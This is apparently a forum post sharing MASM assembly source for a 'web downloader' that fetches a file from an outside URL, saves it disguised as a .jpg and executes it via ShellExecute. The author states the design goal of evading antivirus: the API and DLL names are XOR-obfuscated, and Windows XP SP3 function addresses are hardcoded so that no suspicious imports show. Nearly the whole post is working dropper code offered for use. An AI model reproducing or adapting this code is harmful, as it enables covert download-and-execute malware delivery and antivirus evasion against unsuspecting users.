[MASM] Web Downloader

[Gonzalez]

That's a simple web downloader.

At the beginning the file has no API's except the kernel.dll, so the AV's can't find any dangerous code.

Does only work on XP SP3 because the kernel.dll address changes every SP.

.386
.model flat,stdcall
option casemap:none


.data
;Download strings
file db "download.jpg",0 ;will be saved as
url db "http://i33.tinypic.com/16ljles.jpg",0 ;url to file
open db "open",0

;crypted urlmon.dll and URLDownloadToFileA Api
dll db "pwihjk+aii",0
api db "PWIAjrkijdaQjCli`D",0


;crypted shell32.dll und ShellExecuteA Api

dll2 db "vm`ii67+aii",0
api2 db "Vm`ii@}`fpq`D",0



.code

start:


;Get size of the dll string

push offset dll
mov eax ,7C80BE46h
call eax

;decrypt dll string
mov ecx,eax
mov edi,offset dll
lp:
mov al, byte ptr [edi]
xor al,5
mov byte ptr [edi],al
inc edi
loop lp

;get size of the dll string
push offset api
mov eax ,7C80BE46h
call eax

;decrypt dll string
mov ecx,eax
mov edi,offset api
lp2:
mov al, byte ptr [edi]
xor al,5
mov byte ptr [edi],al
inc edi
loop lp2

;loadlibrary getprocaddress to load urlmon.dll and with getprocaddress find the  address from the api
push offset dll
mov eax,7C801D7Bh
call eax
push offset api
push eax
mov ebx,7C80AE30h
call ebx


;execute urlmon
push 0
push 0
push offset file
push offset url
push 0
call eax

;get size
push offset dll2
mov eax ,7C80BE46h
call eax

;decrypt
mov ecx,eax
mov edi,offset dll2
lp3:
mov al, byte ptr [edi]
xor al,5
mov byte ptr [edi],al
inc edi
loop lp3

;get size
push offset api2
mov eax ,7C80BE46h
call eax

;decrypt
mov ecx,eax
mov edi,offset api2
lp4:
mov al, byte ptr [edi]
xor al,5
mov byte ptr [edi],al
inc edi
loop lp4


push offset dll2
mov eax,7C801D7Bh
call eax
push offset api2
push eax
mov ebx,7C80AE30h
call ebx

;execute shellexecute api
push 5
push 0
push 0
push offset file
push offset open
push 0
call eax


;exitprocess
push 0
mov eax,7C81CAFAh
call eax

end start